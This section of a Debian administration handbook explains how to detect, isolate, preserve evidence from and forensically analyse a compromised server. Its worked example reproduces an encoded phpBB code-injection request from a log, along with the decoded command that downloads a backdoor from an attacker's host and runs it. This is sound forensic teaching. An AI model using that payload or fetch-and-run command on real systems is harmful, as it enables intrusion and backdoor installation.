14.6. Dealing with a Compromised Machine
Despite the best intentions and however carefully designed the security policy, an administrator eventually faces an act of hijacking. This section provides a few guidelines on how to react when confronted with these unfortunate circumstances.
14.6.1. Detecting and Seeing the Cracker's Intrusion
The first step of reacting to cracking is to be aware of such an act. This is not self-evident, especially without an adequate monitoring infrastructure.
Cracking acts are often not detected until they have direct consequences on the legitimate services hosted on the machine, such as connections slowing down, some users being unable to connect, or any other kind of malfunction. Faced with these problems, the administrator needs to have a good look at the machine and carefully scrutinize what misbehaves. This is usually the time when they discover an unusual process, for instance one named apache
instead of the standard /usr/sbin/apache2
. If we follow that example, the thing to do is to note its process identifier, and check /proc/pid/exe
to see what program this process is currently running:
#
ls -al /proc/3719/exe
lrwxrwxrwx 1 www-data www-data 0 2007-04-20 16:19 /proc/3719/exe -> /var/tmp/.bash_httpd/psybnc
A program installed under /var/tmp/
and running as the web server? No doubt left, the machine is compromised.
This is only one example, but many other hints can ring the administrator's bell:
an option to a command that no longer works; the version of the software that the command claims to be doesn't match the version that is supposed to be installed according to dpkg
;
a command prompt or a session greeting indicating that the last connection came from an unknown server on another continent;
errors caused by the /tmp/
partition being full, which turned out to be full of illegal copies of movies;
and so on.
14.6.2. Putting the Server Off-Line
In any but the most exotic cases, the cracking comes from the network, and the attacker needs a working network to reach their targets (access confidential data, share illegal files, hide their identity by using the machine as a relay, and so on). Unplugging the computer from the network will prevent the attacker from reaching these targets, if they haven't managed to do so yet.
This may only be possible if the server is physically accessible. When the server is hosted in a hosting provider's data center halfway across the country, or if the server is not accessible for any other reason, it's usually a good idea to start by gathering some important information (see following sections), then isolating that server as much as possible by shutting down as many services as possible (usually, everything but sshd
). This case is still awkward, since one can't rule out the possibility of the attacker having SSH access like the administrator has; this makes it harder to “clean” the machines.
14.6.3. Keeping Everything that Could Be Used as Evidence
Understanding the attack and/or engaging legal action against the attackers requires taking copies of all the important elements; this includes the contents of the hard disk, a list of all running processes, and a list of all open connections. The contents of the RAM could also be used, but it is rarely used in practice.
In the heat of action, administrators are often tempted to perform many checks on the compromised machine; this is usually not a good idea. Every command is potentially subverted and can erase pieces of evidence. The checks should be restricted to the minimal set (netstat -tupan
for network connections, ps auxf
for a list of processes, ls -alR /proc/[0-9]*
for a little more information on running programs), and every performed check should carefully be written down.
Once the “dynamic” elements have been saved, the next step is to store a complete image of the hard-disk. Making such an image is impossible if the filesystem is still evolving, which is why it must be remounted read-only. The simplest solution is often to halt the server brutally (after running sync
) and reboot it on a rescue CD. Each partition should be copied with a tool such as dd
; these images can be sent to another server (possibly with the very convenient nc
tool). Another possibility may be even simpler: just get the disk out of the machine and replace it with a new one that can be reformatted and reinstalled.
The server should not be brought back on line without a complete reinstallation. If the compromise was severe (if administrative privileges were obtained), there is almost no other way to be sure that we're rid of everything the attacker may have left behind (particularly backdoors). Of course, all the latest security updates must also be applied so as to plug the vulnerability used by the attacker. Ideally, analyzing the attack should point at this attack vector, so one can be sure of actually fixing it; otherwise, one can only hope that the vulnerability was one of those fixed by the updates.
Reinstalling a remote server is not always easy; it may involve assistance from the hosting company, because not all such companies provide automated reinstallation systems. Care should be taken not to reinstall the machine from backups taken later than the compromise. Ideally, only data should be restored, the actual software should be reinstalled from the installation media.
14.6.5. Forensic Analysis
Now that the service has been restored, it is time to have a closer look at the disk images of the compromised system in order to understand the attack vector. When mounting these images, care should be taken to use the ro,nodev,noexec,noatime
options so as to avoid changing the contents (including timestamps of access to files) or running compromised programs by mistake.
Retracing an attack scenario usually involves looking for everything that was modified and executed:
.bash_history
files often provide for a very interesting read;
so does listing files that were recently created, modified or accessed;
the strings
command helps identifying programs installed by the attacker, by extracting text strings from a binary;
the log files in /var/log/
often allow reconstructing a chronology of events;
special-purpose tools also allow restoring the contents of potentially deleted files, including log files that attackers often delete.
Some of these operations can be made easier with specialized software. In particular,
The Coroner Toolkit (in the
tct package) is a collection of such tools. It includes several tools; amongst these,
grave-robber
can collect data from a running compromised system,
lazarus
extracts often interesting data from non-allocated regions on disks, and
pcat
can copy the memory used by a process; other data extraction tools are also included.
The
sleuthkit package provides a few other tools to analyze a filesystem. Their use is made easier by the
Autopsy Forensic Browser graphical interface (in the
autopsy package).
14.6.6. Reconstituting the Attack Scenario
All the elements collected during the analysis should fit together like pieces in a jigsaw puzzle; the creation of the first suspect files is often correlated with logs proving the breach. A real-world example should be more explicit than long theoretical ramblings.
The following log is an extract from an Apache access.log
:
www.falcot.com 200.58.141.84 - - [27/Nov/2004:13:33:34 +0100] "GET /phpbb/viewtopic.php?t=10&highlight=%2527%252esystem(chr(99)%252echr(100)%252echr(32)%252echr(47)%252echr(116)%252echr(109)%252echr(112)%252echr(59)%252echr(32)%252echr(119)%252echr(103)%252echr(101)%252echr(116)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(124)%252echr(124)%252echr(32)%252echr(99)%252echr(117)%252echr(114)%252echr(108)%252echr(32)%252echr(103)%252echr(97)%252echr(98)%252echr(114)%252echr(121)%252echr(107)%252echr(46)%252echr(97)%252echr(108)%252echr(116)%252echr(101)%252echr(114)%252echr(118)%252echr(105)%252echr(115)%252echr(116)%252echr(97)%252echr(46)%252echr(111)%252echr(114)%252echr(103)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(45)%252echr(111)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(99)%252echr(104)%252echr(109)%252echr(111)%252echr(100)%252echr(32)%252echr(43)%252echr(120)%252echr(32)%252echr(98)%252echr(100)%252echr(59)%252echr(32)%252echr(46)%252echr(47)%252echr(98)%252echr(100)%252echr(32)%252echr(38))%252e%2527 HTTP/1.1" 200 27969 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
This example matches exploitation of an old security vulnerability in phpBB.
Decoding this long URL leads to understanding that the attacker managed to run some PHP code, namely: system("cd /tmp; wget gabryk.altervista.org/bd || curl gabryk.altervista.org/bd -o bd; chmod +x bd; ./bd &")
. Indeed, a bd
file was found in /tmp/
. Running strings /mnt/tmp/bd
returns, among other strings, PsychoPhobia Backdoor is starting...
. This really looks like a backdoor.
Some time later, this access was used to download, install and run an IRC bot that connected to an underground IRC network. The bot could then be controlled via this protocol and instructed to download files for sharing. This program even has its own log file:
** 2004-11-29-19:50:15: NOTICE: :GAB!sex@Rizon-2EDFBC28.pool8250.interbusiness.it NOTICE ReV|DivXNeW|504 :DCC Chat (82.50.72.202)
** 2004-11-29-19:50:15: DCC CHAT attempt authorized from GAB!SEX@RIZON-2EDFBC28.POOL8250.INTERBUSINESS.IT
** 2004-11-29-19:50:15: DCC CHAT received from GAB, attempting connection to 82.50.72.202:1024
** 2004-11-29-19:50:15: DCC CHAT connection suceeded, authenticating
** 2004-11-29-19:50:20: DCC CHAT Correct password
(...)
** 2004-11-29-19:50:49: DCC Send Accepted from ReV|DivXNeW|502: In.Ostaggio-iTa.Oper_-DvdScr.avi (713034KB)
(...)
** 2004-11-29-20:10:11: DCC Send Accepted from GAB: La_tela_dell_assassino.avi (666615KB)
(...)
** 2004-11-29-21:10:36: DCC Upload: Transfer Completed (666615 KB, 1 hr 24 sec, 183.9 KB/sec)
(...)
** 2004-11-29-22:18:57: DCC Upload: Transfer Completed (713034 KB, 2 hr 28 min 7 sec, 80.2 KB/sec)
These traces show that two video files have been stored on the server by way of the 82.50.72.202 IP address.
In parallel, the attacker also downloaded a pair of extra files, /tmp/pt
and /tmp/loginx
. Running these files through strings
leads to strings such as Shellcode placed at 0x%08lx and Now wait for suid shell.... These look like programs exploiting local vulnerabilities to obtain administrative privileges. Did they reach their target? In this case, probably not, since no files seem to have been modified after the initial breach.
In this example, the whole intrusion has been reconstructed, and it can be deduced that the attacker has been able to take advantage of the compromised system for about three days; but the most important element in the analysis is that the vulnerability has been identified, and the administrator can be sure that the new installation really does fix the vulnerability.